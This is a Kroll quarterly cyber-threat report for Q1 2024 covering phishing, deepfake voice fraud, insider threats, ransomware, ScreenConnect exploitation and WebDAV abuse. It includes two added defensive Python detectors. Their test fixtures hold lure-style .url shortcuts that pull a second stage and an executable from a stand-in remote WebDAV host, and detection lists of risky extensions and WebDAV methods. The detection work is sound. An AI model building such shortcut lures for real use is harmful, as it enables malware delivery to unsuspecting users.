Authors
Laurie Iacono, George Glass, Keith Wojcieszek
In Q1 2024, we saw an evolution in the techniques used by attackers, some of which may point to longer-term trends in the variety and sophistication of attacks faced by organizations. In particular, with regard to phishing, we saw SMS- and voice-based lures being used, which raises concern that deepfakes and other AI-type technologies could further enhance the effectiveness of phishing attacks.
In the same vein, one insider threat case investigated by Kroll this quarter involved employee impersonation, another area where AI-type technology could be especially effective. Also this quarter, Kroll's investigation into the ScreenConnect CVEs shows attackers getting faster at exploiting newly published vulnerabilities.
Two industries are the focus in Q1 2024: technology/telecoms and construction. The former saw significant growth in insider threat cases, potentially a result of increased supply chain risk. The latter saw steady growth in email compromise over the past year, which could be driven by the nature of work in the industry: employees are often working from mobile devices or on site, where they may be more susceptible to phishing.
Q1 2024 Threat Timeline
January
- Two zero-day vulnerabilities identified in Ivanti Connect Secure and Ivanti Policy Secure gateways.
- AKIRA ransomware tactics, techniques and procedures (TTPs) evolve, with threat actors targeting companies with vulnerable internet-facing Cisco ASA or FTD devices, then wiping those companies' backups before deploying the ransomware.
February
- Kroll identified critical vulnerabilities in ConnectWise ScreenConnect that allowed for authentication bypass and remote code execution.
- The LOCKBIT ransomware group has its operation disrupted by law enforcement, with the takedown of its data leak site, 34 servers and account closures. Law enforcement officials also obtain decryption keys and make two arrests.
- LOCKBIT returns towards the end of the month with new encryptors and servers for attacks, as well as an updated ransom note.
- Change Healthcare is hit by a cybersecurity incident. Numerous healthcare organizations report major outages due to the attack.
March
- KTA248 begins a campaign of PIKABOT distribution via email and another campaign that attempts to exfiltrate NTLMv2 hashes from victim environments.
- BLACKCAT shuts off their servers amid claims that they exit scammed, allegedly faking the law enforcement seizure posted on their Tor site to avoid sharing a new ransom payment with their affiliates.
Sector Analysis—Professional Services Continues to be Top Target
Most Targeted Industry by Sector Over the Past Three Quarters
The sectors targeted by threat actors in Q1 2024 were consistent with previous quarters. Professional services remained the focus for attacks, accounting for 24% of cases, while manufacturing continued to rank at second place, with 13% of cases, followed by financial services and health care at 9% and 8% respectively.
Sector Spotlight: Business Email Compromise Becomes an Issue for Construction Industry
Incident Response Cases in the Construction Industry Over the Past Five Quarters
Q1 2024 Construction Sector—Threat Incident Types
In Q1 2024, attacks against the construction sector accounted for nearly 6% of all Kroll incident response engagements, double the sector's previous peak of 3% in Q1 2023. Attacks against the construction sector are most likely to be some form of business email compromise (BEC). A review of cases indicates that carefully crafted phishing lures designed to mirror document-signing services are a common way to socially engineer victims into giving up their credentials and, in some cases, approving their multi-factor authentication (MFA) prompts, with an attacker-in-the-middle (AiTM) phishing page relaying the login so that the attacker ends up holding the authenticated session.
Construction firms may be targeted in this way for several different purposes. One is for financial gain, as a result of social engineering campaigns that redirect vendor payments to a fraudulent bank account.
In other cases, the construction company is used as the pivot point for downstream attacks: actors use unauthorized access to a user's email inbox to phish the firm's clients and vendors, for example by sending fake requests for document signature to multiple vendors in order to harvest those vendors' credentials and extend their access.
The reason for these rising attacks may be because the industry involves many digital sign-ins via mobile devices on sites. An employee may be more likely to fall for a phishing lure if they are receiving the email on the road, making them potentially less vigilant about the signs of a fraudulent email.
Threat Incident Types: Variation in Phishing Techniques Signals an Evolution in Tactics
Most Popular Threat Incident Types—Past Three Quarters
In Q1 2024, Kroll observed a slight increase in email compromise, with it remaining the most common type of threat incident. Interestingly, the percentage of ransomware cases declined in Q1, potentially as a result of disruptions affecting the large ransomware-as-a-service variants such as LockBit and BlackCat.
Phishing was the most likely vector for email compromise incidents. While phishing has typically been synonymous with an email message, in Q1 Kroll observed actors continuing to evolve, introducing other lures such as SMS messages (smishing) and voice calls (vishing), which appear to be rising in popularity.
For many firms, the controls put in place to reduce the likelihood of BEC include verbal verification with C-level personnel (such as the chief executive or chief financial officer) before acting on a request received by email. Although these were intended to add an extra layer of authentication for requests that would otherwise be handled strictly through email, Kroll has observed cases in which actors likely used commonly available deepfake tools to clone the voices of CEOs and CFOs.
Case Study: Evidence of Voice Cloning Highlights the Risk of Deepfakes
In one such case, Kroll noted repeated voicemail messages simulating the CEO’s voice to authorize fraudulent transactions. The messages were upwards of five minutes long, potentially to increase the likelihood of the scam being actioned. While employees may be more suspicious of a short message cloning the CEO’s voice, a longer message—which leverages publicly available voice recordings of the CEO—arguably seems more legitimate. Such attempts highlight the increased risk that deep fakes and other AI-type technologies pose to organizations.
Technology and Telecoms Industry Most Susceptible to Insider Threat, Highlighting Threat of Supply Chain Attacks
Q1 2024—Insider Threat Incidents by Sector
A review of Kroll engagements for insider threat revealed insights into the sectors most vulnerable to such attacks. In Q1, Kroll observed that cases impacting the technology/telecom sector were most likely to be insider threat cases. With most technology providers working with multiple downstream customers, an insider with access to multiple technology providers may have the ability to cascade malicious activity to clients, posing the risk of a supply chain attack.
For the first time, we also split out the proportion of insider threat engagements deemed intentional versus unintentional. In 90% of cases, Kroll observed the insider threat to be intentional, and therefore arguably malicious, as opposed to accidental. This highlights why companies should not overlook insider threat as an incident type.
Case Study: Employee Impersonation Insider Threat
In one case observed by Kroll in Q1, an employee onboarded by a third-party contracting firm began displaying suspicious behavior. The employee, who had been given access to confidential and sensitive information due to their job role, frequently delayed communication and stopped communicating altogether once more serious questions were raised about the legitimacy of their identity.
In this case, Kroll was able to help the company identify that the employed individual was accessing the network from a different country from the one they claimed to reside in. Kroll also helped identify the data at risk associated with the employee's access.
Although Kroll did not observe the use of deep fake technology in enhancing the employee impersonation, this case does highlight how sophisticated AI technology could result in more convincing campaigns of this type.
Ransomware Variants Q1 2024
Top 10 Ransomware Variants Q1 2024
The AKIRA ransomware group took the lead in Q1 2024 with 27% of cases and LOCKBIT slipped into second place with 15% of cases. We also saw a significant drop in PLAY ransomware group activity, from 11% of cases in Q4 2023 to 5% in Q1 2024.
Phishing Dominates Initial Access Methods
Top 4 Initial Access Methods—Past Three Quarters
Phishing remained the top initial access vector across all threat incident types. For events where phishing was the main initial access vector, the threat type was most likely to be email compromise.
Kroll continued to observe an increase in attacks that began with a social engineering nexus and observed increases for incidents that started with threat actors exploiting public-facing applications, such as Cisco’s Adaptive Security Appliance (ASA) virtual private networks and ScreenConnect remote management tools. Attacks targeting known vulnerabilities were most likely to result in a ransomware incident.
Initial Access Spotlight: ScreenConnect CVE Exploited in Less Than 48 Hours by Range of Threat Actor Types
On February 19, ConnectWise notified customers of two vulnerabilities (CVE-2024-1709, an authentication bypass, and CVE-2024-1708, a path traversal) affecting on-premises versions of its remote management tool, ScreenConnect (versions 23.9.7 and prior). The authentication bypass allows an unauthenticated attacker to create an administrative account on the server; with that account, the attacker holds system administrator-level privileges over the ScreenConnect instance.
In the immediate aftermath of the publication, Kroll responded to many engagements where attackers exploited this vulnerability to act maliciously in victims' networks. On the managed detection and response (MDR) side, Kroll was able to identify and quarantine exploitation activity before it progressed to a full-blown incident. In at least one case, Kroll identified a file containing a new malware variant, TODDLERSHARK, related to the Kimsuky threat actor group.
On the incident response side, Kroll observed that a majority of its ScreenConnect cases had an initial access date of February 21, indicating that actors were exploiting the vulnerability within less than 48 hours of the original announcement.
Based on a review of these cases, Kroll observed a wide range of threat actors leveraging the vulnerability.
In Kroll’s review, cases occurring within the first five days of the publication were more likely to be associated with larger-scale threat actor groups. Three weeks on from the publication date, fewer cases were observed, likely due to widespread patching. Cases observed during this time period were more likely to be associated with lone wolf actors or less sophisticated threat actor groups.
Malware Trends and Analysis
Kroll actively tracks malware C2 infrastructure, submissions to public sandboxes and active incident response (IR) and MDR case data to generate lists of the most active malware strains for comparison. In Q1, the most notable changes were a drop in activity from QAKBOT and PIKABOT. Kroll’s Cyber Threat Intelligence team believes that this is due to a shift in KTA248 behavior toward other malware strains, such as ICEDID and ICENOVA.
Top 10 Malware Strains—Q1 2024
In Q1, Kroll observed an uptick in threat actors leveraging WebDAV for remote file access from Windows hosts. WebDAV (Web Distributed Authoring and Versioning) extends the Hypertext Transfer Protocol (HTTP) with a standard set of methods that users and web services can use to create, modify and move documents on a server, and it allows multiple users to work simultaneously on the same content. On Windows, the WebClient service maps a WebDAV server onto a UNC path, so a remote HTTP resource can be opened as if it were a file on a network share.
Kroll also observed actors leveraging vulnerabilities in Microsoft Defender SmartScreen (CVE-2023-36025 and CVE-2024-21412) that let an attacker send an internet shortcut (.url) file with an embedded malicious URL designed to bypass security warnings. Kroll observed multiple campaigns using the technique to distribute several malware families, including TIMBERSTEALER, DARKME, DARKGATE and ICENOVA (LATRODECTUS).
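To show what the internet-shortcut lure looks like on disk and how a triage script can flag it, here is an added example; it is not Kroll's code or tooling. It assumes the standard .url layout (an [InternetShortcut] section with a URL= key), that a target pointing at a UNC path or at a file:// URL with a non-local host means a remote SMB/WebDAV fetch, and that the Windows host@80 / host@SSL WebDAV notation may appear in the target. The sample shortcut files are constructed and use a TEST-NET address.

```python
"""Triage Windows internet shortcut (.url) files for remote-fetch targets.

Added example, not Kroll's code. Assumes the standard INI-style layout
([InternetShortcut] section, URL= key). The sample files below are constructed.
"""
import configparser
import re
from urllib.parse import urlparse

# Hosts treated as the local machine when a file:// target names them.
LOCAL_HOSTS = {"", "localhost", "127.0.0.1"}
# A shortcut whose target ends in one of these is itself a stager, not a document.
RISKY_EXTENSIONS = (".url", ".lnk", ".exe", ".js", ".vbs", ".msi", ".cmd", ".bat", ".hta")
# UNC form: \\host\share\... or //host/share/...
UNC_RE = re.compile(r"^(?:\\\\|//)([^\\/]+)[\\/]")


def parse_url_shortcut(text):
    """Return the URL= target from a .url file body, or None if absent."""
    cp = configparser.ConfigParser(interpolation=None, strict=False)
    cp.optionxform = str  # keep key case so 'URL' and 'url' both survive
    cp.read_string(text)
    for section in cp.sections():
        if section.lower() == "internetshortcut":
            for key, value in cp.items(section):
                if key.lower() == "url":
                    return value.strip()
    return None


def normalize_host(netloc):
    """Strip the Windows WebDAV suffix (host@80, host@SSL) down to the bare host."""
    host = netloc.lower()
    if "@" in host:
        left, right = host.rsplit("@", 1)
        if right == "ssl" or right.isdigit():
            host = left
    return host


def classify_target(target):
    """Classify a target as local, remote_file, web or other, returning (kind, host)."""
    m = UNC_RE.match(target)
    if m:
        return "remote_file", normalize_host(m.group(1))
    parsed = urlparse(target)
    scheme = parsed.scheme.lower()
    host = normalize_host(parsed.netloc)
    if scheme == "file":
        return ("local" if host in LOCAL_HOSTS else "remote_file"), host
    if scheme in ("http", "https"):
        return "web", host
    return "other", host


def assess_shortcut(text):
    """Parse one .url body and return a verdict dict with the reasons it was flagged."""
    target = parse_url_shortcut(text)
    if target is None:
        return {"target": None, "kind": "none", "host": "", "suspicious": False, "reasons": []}
    kind, host = classify_target(target)
    reasons = []
    if kind == "remote_file":
        reasons.append("target is a remote file path (UNC/WebDAV/SMB)")
    if target.lower().endswith(RISKY_EXTENSIONS):
        reasons.append("target is an executable or another shortcut")
    return {"target": target, "kind": kind, "host": host,
            "suspicious": bool(reasons), "reasons": reasons}


def scan(files):
    """Return the names of shortcuts flagged as suspicious, in input order."""
    return [name for name, body in files.items() if assess_shortcut(body)["suspicious"]]


# Constructed samples: one ordinary bookmark, two lure-style stagers (TEST-NET address).
SAMPLES = {
    "bookmark.url": "[InternetShortcut]\r\nURL=https://www.example.com/\r\n",
    "invoice.url": "[InternetShortcut]\r\nURL=file://203.0.113.10@80/Dav/stage2.url\r\nIconIndex=1\r\n",
    "update.url": "[InternetShortcut]\r\nURL=\\\\203.0.113.10@SSL\\DavWWWRoot\\update.exe\r\n",
}

if __name__ == "__main__":
    for name, body in SAMPLES.items():
        print(name, assess_shortcut(body))
```

The two flagged samples are the shape of the chain the paragraph above describes: a shortcut whose target is not a web page but a second shortcut or an executable sitting on a remote WebDAV share, which is why the check looks at both where the target lives and what it is, rather than at the URL scheme alone.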
WebDAV has a long history of security issues, particularly in combination with Windows file-sharing technology. Previously, we have seen issues such as the leaking of users' NT LAN Manager (NTLM) hashes, and more recently the SmartScreen bypass vulnerabilities above. Those vulnerabilities are not the only reason WebDAV is attractive to an attacker. Because it is integrated into Windows, it is harder to detect than a suspicious process making its own network connections: with WebDAV, the operating system's file-sharing component owns the actual network interaction, while the malicious process is ostensibly just opening a file. WebDAV also gives an attacker a simple means of remote file transfer with minimal code, as even a basic batch script can download a file with a copy command against a UNC path. Where possible, it is recommended to block WebDAV traffic at the perimeter.
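As an added example of the perimeter-side check the recommendation above implies (this is not Kroll's code), the script below walks a web-proxy log and reports internal clients talking WebDAV to non-internal destinations. It assumes a tab-separated proxy log of timestamp, client IP, method, URL, status and User-Agent; it treats the RFC 1918 ranges plus an assumed .corp.internal DNS suffix as "inside"; and it relies on the Windows WebClient service identifying itself with the Microsoft-WebDAV-MiniRedir User-Agent. The log records are constructed.

```python
"""Report WebDAV egress in a web-proxy log.

Added example, not Kroll's code. Assumes a tab-separated log of
timestamp, client, method, url, status, user_agent. Records are constructed.
"""
import ipaddress
from urllib.parse import urlparse

# Methods defined by WebDAV (RFC 4918); ordinary browsing never issues them.
WEBDAV_METHODS = {"PROPFIND", "PROPPATCH", "MKCOL", "COPY", "MOVE", "LOCK", "UNLOCK"}
# User-Agent prefix of the Windows WebDAV Mini-Redirector (WebClient service).
MINIREDIR_UA = "Microsoft-WebDAV-MiniRedir/"
# What counts as "inside": RFC 1918 plus an assumed internal DNS suffix.
INTERNAL_NETS = [ipaddress.ip_network(n) for n in ("10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16")]
INTERNAL_SUFFIXES = (".corp.internal",)


def is_internal(host):
    """True for RFC 1918 addresses and names under an internal suffix."""
    try:
        addr = ipaddress.ip_address(host)
    except ValueError:
        return host.lower().endswith(INTERNAL_SUFFIXES)
    return any(addr in net for net in INTERNAL_NETS)


def parse_line(line):
    """Split one tab-separated log line into a record, or None if malformed."""
    fields = line.rstrip("\r\n").split("\t")
    if len(fields) != 6:
        return None
    ts, client, method, url, status, ua = fields
    return {"ts": ts, "client": client, "method": method.upper(), "url": url,
            "status": status, "ua": ua, "host": urlparse(url).hostname or ""}


def webdav_indicators(rec):
    """Reasons a record looks like WebDAV; an empty list means it does not."""
    reasons = []
    if rec["method"] in WEBDAV_METHODS:
        reasons.append("WebDAV method " + rec["method"])
    if rec["ua"].startswith(MINIREDIR_UA):
        reasons.append("WebClient (MiniRedir) user agent")
    return reasons


def find_webdav_egress(lines):
    """Return the records carrying WebDAV indicators toward a non-internal host."""
    hits = []
    for line in lines:
        rec = parse_line(line)
        if rec is None or not rec["host"] or is_internal(rec["host"]):
            continue  # malformed line, or legitimate internal DAV use we do not alert on
        reasons = webdav_indicators(rec)
        if reasons:
            hits.append(dict(rec, reasons=reasons))
    return hits


def summarize(hits):
    """Map each internal client to the sorted list of external DAV hosts it reached."""
    by_client = {}
    for h in hits:
        by_client.setdefault(h["client"], set()).add(h["host"])
    return {c: sorted(hosts) for c, hosts in by_client.items()}


# Constructed log: 10.0.4.23 opens a .url lure and its WebClient service fetches the
# second stage from a TEST-NET host over WebDAV; 10.0.7.8 uses an internal DAV share.
LOG_RECORDS = [
    ("2024-03-04T09:12:01Z", "10.0.4.23", "GET", "https://www.example.com/", "200", "Mozilla/5.0"),
    ("2024-03-04T09:12:09Z", "10.0.4.23", "OPTIONS", "http://203.0.113.10/Dav/", "200", "Microsoft-WebDAV-MiniRedir/10.0.19045"),
    ("2024-03-04T09:12:09Z", "10.0.4.23", "PROPFIND", "http://203.0.113.10/Dav/stage2.url", "207", "Microsoft-WebDAV-MiniRedir/10.0.19045"),
    ("2024-03-04T09:12:10Z", "10.0.4.23", "GET", "http://203.0.113.10/Dav/stage2.url", "200", "Microsoft-WebDAV-MiniRedir/10.0.19045"),
    ("2024-03-04T09:13:00Z", "10.0.7.8", "PROPFIND", "http://files.corp.internal/dav/", "207", "Microsoft-WebDAV-MiniRedir/10.0.19045"),
    ("2024-03-04T09:14:00Z", "10.0.4.41", "GET", "https://cdn.example.net/lib.js", "200", "Mozilla/5.0"),
]
LOG_LINES = ["\t".join(r) for r in LOG_RECORDS]

if __name__ == "__main__":
    found = find_webdav_egress(LOG_LINES)
    for h in found:
        print(h["ts"], h["client"], "->", h["host"], h["method"], "; ".join(h["reasons"]))
    print(summarize(found))
```

The User-Agent rule matters as much as the method rule: after the directory is enumerated with PROPFIND, the actual file fetch is a plain GET, and on the endpoint that GET is issued by the WebClient service inside svchost.exe rather than by the script that asked for the file. That is the detection gap the paragraph above describes, and it is why a proxy or perimeter log is a better place to see this traffic than per-process network telemetry on the host.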
Recommendations for Detecting Deepfakes
One of the most effective mitigations against deepfakes and AI-type attacks is to improve detections, and security teams should have this as part of their training.
For pre-recorded deepfakes:
- The video sender’s address is often spoofed or unknown.
- Reverse image searches can often identify the source footage behind lower-quality, mass-produced deepfake videos.
For live deepfakes:
- The individual can be asked to make extensive movements to test for discoloration, abnormal body shapes, distorted limbs and irregular hair flickering.
- Adopt a policy requiring standard movement checks on video calls before sensitive requests are actioned; if this is part of regular compliance procedures, it avoids awkwardness when the check is applied.
For AI-enabled deepfakes:
- Detection models should be trained on individuals, rather than generically trying to identify deepfakes.
Evolving Threats and Tactics Signal Need for Breadth of Cyber Protection
Kroll’s findings for the first quarter of 2024 highlight the value of a broad cyber protection strategy for organizations. From familiar security foes—such as malware to the evolution of newer ones, like deepfakes—trends observed throughout the quarter prove that cyber threats of many types are now very much the norm rather than the exception for many industries. Organizations need a cyber strategy that can guide them from building resilience to these varied threats, to threat hunting and detection, through to complete response and recovery.
The increase in insider threats noted this quarter means that businesses must ensure they are prepared to tackle the threat from within, as well as addressing increasingly varying types of external risks. At a time when vulnerabilities are exploited by attackers ranging in scale from nation states to solo actors, the threat landscape is becoming increasingly complex to navigate. As threat actors continue to leverage innovative approaches to attack, so too must organizations in response. Faced by the growing AI challenge, organizations can no longer risk relying on purely defensive or one-dimensional approaches to security. Instead, they must ensure that their vigilance translates into a strategy that proactively addresses all layers of the attack surface.
With AI, deepfake tech, SMS lures and other technology highly likely to provide even more opportunities for threat actors in the near future, companies need to be vigilant in building a comprehensive cyber protection strategy. Adapting in this climate means collaborating with a security partner capable of scaling up and with the breadth of vision and solutions to ensure that organizations can stay ahead at every stage of the threat lifecycle. Only by doing so can companies ensure they remain resilient in the face of formidable security challenges.